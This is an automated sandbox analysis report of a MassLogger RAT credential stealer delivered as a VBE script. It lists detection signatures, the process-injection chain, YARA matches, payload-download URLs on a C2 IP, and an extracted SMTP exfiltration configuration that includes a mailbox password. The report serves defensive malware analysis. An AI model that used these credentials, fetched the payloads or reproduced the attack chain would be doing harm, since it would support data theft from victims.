Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#150062.vbe

Overview

General Information

Sample name:Ref#150062.vbe
Analysis ID:1557622
MD5:2874840f439a79083be1cb832dbd10f4
SHA1:e121f6fd96b75bc492c4a463c9d03d273d658f1b
SHA256:491e3f2d6ee7add3f362046c59a5ff7f8a292119b762d2b1f3174a283d41393d
Tags:vbeuser-TeamDreier
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7064 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 4592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 1260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7064 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wermgr.exe (PID: 2248 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 1888 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 5184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • wermgr.exe (PID: 2380 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • rundll32.exe (PID: 6820 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
{"EXfil Mode": "SMTP", "From": "sendxmaffle@jertcot.shop", "Password": "VVNrTTiP", "Server": "jertcot.shop", "To": "maffle@jertcot.shop", "Port": 587}
SourceRuleDescriptionAuthorStrings
0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xeffd:$a1: get_encryptedPassword
        • 0xf325:$a2: get_encryptedUsername
        • 0xed86:$a3: get_timePasswordChanged
        • 0xeea7:$a4: get_passwordField
        • 0xf013:$a5: set_encryptedPassword
        • 0x10978:$a7: get_logins
        • 0x10629:$a8: GetOutlookPasswords
        • 0x1041b:$a9: StartKeylogger
        • 0x108c8:$a10: KeyLoggerEventArgs
        • 0x10478:$a11: KeyLoggerEventArgsEventHandler
        0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 5 entries
          SourceRuleDescriptionAuthorStrings
          12.2.RegSvcs.exe.1160000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            12.2.RegSvcs.exe.1160000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              12.2.RegSvcs.exe.1160000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                12.2.RegSvcs.exe.1160000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xf1fd:$a1: get_encryptedPassword
                • 0xf525:$a2: get_encryptedUsername
                • 0xef86:$a3: get_timePasswordChanged
                • 0xf0a7:$a4: get_passwordField
                • 0xf213:$a5: set_encryptedPassword
                • 0x10b78:$a7: get_logins
                • 0x10829:$a8: GetOutlookPasswords
                • 0x1061b:$a9: StartKeylogger
                • 0x10ac8:$a10: KeyLoggerEventArgs
                • 0x10678:$a11: KeyLoggerEventArgsEventHandler
                12.2.RegSvcs.exe.1160000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x14269:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x13767:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x13a75:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1486d:$a5: \Kometa\User Data\Default\Login Data
                SourceRuleDescriptionAuthorStrings
                amsi64_1888.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc137:$b2: ::FromBase64String(
                • 0xbda3:$s1: -join
                • 0xc14b:$s1: -join
                • 0x554f:$s4: +=
                • 0x5611:$s4: +=
                • 0x9838:$s4: +=
                • 0xb955:$s4: +=
                • 0xbc3f:$s4: +=
                • 0xbd85:$s4: +=
                • 0xe338:$s4: +=
                • 0xe3b8:$s4: +=
                • 0xe47e:$s4: +=
                • 0xe4fe:$s4: +=
                • 0xe6d4:$s4: +=
                • 0xe758:$s4: +=
                • 0xc55f:$e4: Get-WmiObject
                • 0xc74e:$e4: Get-Process
                • 0xc7a6:$e4: Start-Process

                System Summary

                barindex
                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7064, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", ProcessId: 7064, ProcessName: wscript.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7064, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5184, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49932
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", ProcessId: 7064, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1260, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 7064, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T13:44:23.322025+010028032742Potentially Bad Traffic192.168.2.449883193.122.6.16880TCP
                2024-11-18T13:44:30.337620+010028032742Potentially Bad Traffic192.168.2.449883193.122.6.16880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 12.2.RegSvcs.exe.1160000.0.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendxmaffle@jertcot.shop", "Password": "VVNrTTiP", "Server": "jertcot.shop", "To": "maffle@jertcot.shop", "Port": 587}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49889 version: TLS 1.0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01618519h12_2_01618268
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01618DB8h12_2_016189A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01618DB8h12_2_0161898F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01618DB8h12_2_01618CE6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0161F958h12_2_0161F658
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0161FDB0h12_2_0161FB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push 00000000h12_2_05BF7A68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF0742h12_2_05BF0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF26E0h12_2_05BF2438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_05BF37D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF19D8h12_2_05BF1730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF33E8h12_2_05BF3140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF02E8h12_2_05BF0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF1580h12_2_05BF12D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF44A5h12_2_05BF42C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF4E2Fh12_2_05BF42C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF2F90h12_2_05BF2CE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF2288h12_2_05BF1FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF1128h12_2_05BF0E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF2B38h12_2_05BF2890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF0CD0h12_2_05BF08F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_05BF8875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05BF1E30h12_2_05BF1B88

                Networking

                barindex
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.4:49932 -> 162.254.34.31:587
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 144.91.79.54 144.91.79.54
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49883 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.4:49932 -> 162.254.34.31:587
                Source: global trafficHTTP traffic detected: GET /1211/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/upcYWNLeVWW8atGcZt0Z.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/cn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49889 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1211/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/upcYWNLeVWW8atGcZt0Z.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/cn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET /1211/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: jertcot.shop
                Source: wscript.exe, 00000000.00000003.1718508588.0000014AD4D89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718673514.0000014AD4D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/
                Source: wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/0
                Source: wscript.exe, 00000000.00000003.1855170962.0000014AD4D72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1850754950.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860544185.0000014AD4D73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851807052.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1211/Y
                Source: wscript.exe, 00000000.00000003.1816091185.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1211/cn
                Source: wscript.exe, 00000000.00000003.1816534726.0000014AD4DAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1814678830.0000014AD4DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1211/cng
                Source: wscript.exe, 00000000.00000003.1816091185.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851523290.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1857344788.0000014AD6AB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1853417170.0000014AD6AB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860821496.0000014AD6AB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719027708.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852166734.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1211/r
                Source: wscript.exe, 00000000.00000003.1698784880.0000014AD4D56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1211/s
                Source: wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/8
                Source: wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/H
                Source: wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/ll
                Source: wscript.exe, 00000000.00000003.1852355017.0000014AD4D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852640806.0000014AD4D0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1854323961.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860304459.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/1211/file
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.000000000314E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                Source: RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jertcot.shop
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jertcot.shopd
